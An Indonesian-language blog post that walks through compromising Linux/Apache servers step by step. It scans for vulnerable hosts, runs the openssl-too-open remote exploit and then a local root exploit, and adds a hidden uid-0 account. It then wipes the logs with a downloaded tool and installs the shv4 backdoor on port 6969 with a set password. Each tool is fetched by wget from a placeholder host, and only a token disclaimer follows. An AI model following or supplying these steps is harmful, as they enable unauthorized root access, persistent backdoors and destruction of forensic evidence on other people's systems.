- Download Apache Chunked Scanner
- Download putty.exe
- Scanning for IP range menggunakan Apache Chunked Scanner
- Dapet target buka putty
- login ke shell account lewat ssh <— untuk user windows harus punya shell account di suatu server yang pakai linux langsung aja ke langkah 6 dan ngga perlu putty
- Download openSSL source code ke shell account kita dengan perintah ‘wget www.tempat-download.com/openssl-too-open.tar.gz’
- ekstrak file dengan perintah ‘tar -zxvf openssl-too-open.tar.gz’
- masuk ke direktorinya dengan mengetikan ‘cd openssl-too-open’
- ketik ‘make’ lalu ketik ‘chmod +x openssl’
- ketik ‘./openssl-too-open’ akan terlihat jenis2 server yang bisa di rooting
- target Scanning dari Apache Chunked Scanner anggap saja
IP : 203.10.10.10
Apache : Apache 1.3.23
OS Linux : RedHat 7.3
Maka ketikan ‘./openssl-too-open -a 0x0b -v 203.10.10.10′ - Mulai local xploit ketik ‘mkdir /var/tmp’ lalu masuk ke dir ketik ‘cd /var/tmp’
- Ketik ‘wget www.tempat-download.com/local.tar.gz’
- Ketik ‘tar xzf local.tar.gz’
- Ketik ‘cd local’
- Ketik ‘./lconfex -p’ akan diinformasikan shellcode, padstring, dan magic-number
- Buat direktori ‘segfault.eng’ dengan file ‘segfault.eng’ lalu command touch dan kemudian commad ‘./lconfex -s (shellcode) -m (padstring) -r (magic-number)
untuk perintahnya:
‘mkdir segfault.eng ; touch segfault.eng/segfault.eng’
‘./lconfex -s (shellcode) -m (pandstring) -r (magic-number)’
untuk perintah diatas masalah shellcode, padstring, magic-number kamu pasti tau setelah perintah 17 dijalankan. - Ketik ‘id’ klo muncul —> root uid=0(root) gid=48(apache) groups=48(apache),89(sympa) <— anda adalah root
Tahap adduser, pembersihan log, backdoor
- ketik ‘/usr/sbin/useradd vr -u 0 -o -g root -s /bin/bash -d /dev/.vr passwd -d vr <— add user root nama vr
/usr/sbin/useradd vr <— menambahkan login user nama vr
root <— akses root
/bin/bash -d /dev/.vr <— create dir vr
passwd -d vr <— password vr
* catatan : login, direktori dan password harus sama - Buka new session pakek putty dan mulai login ke target
- Ketik ‘lastlog | grep vr’
- Download tools untuk menghapus jejak kita ketik ‘wget www.tempat-download.com/remove.c’
- compile file tersebut ketik ‘gcc -o r remove.c DGENERIC’
- hapus log user vr ketik ‘./remove vr’
- Install backdoor ketik ‘wget www.alamat-download.com/backdoor.tar.gz’
- ketik ‘tar xzf backdoor.tar.gz’
- Ketik ‘cd shv4′
- Ketik ‘./setup n3rd 6969′ —> n3rd = password login backdoor 6969 = port backdoor
- menghapus semua kemungkinan mengarah ke kita ; user dan direktori yang kita buat ketik ‘/usr/sbin/userdel -r vr’
- BERES… silahkan login ke shell dengan port 6969 dengan password n3rd pada target :p
Jangan diacak2 ya targetnya karena semua ini untuk pengetahuan segala bentuk penyalahgunaan bukan tanggung jawab saya.
VR-X69 (NERD)
Posting Komentar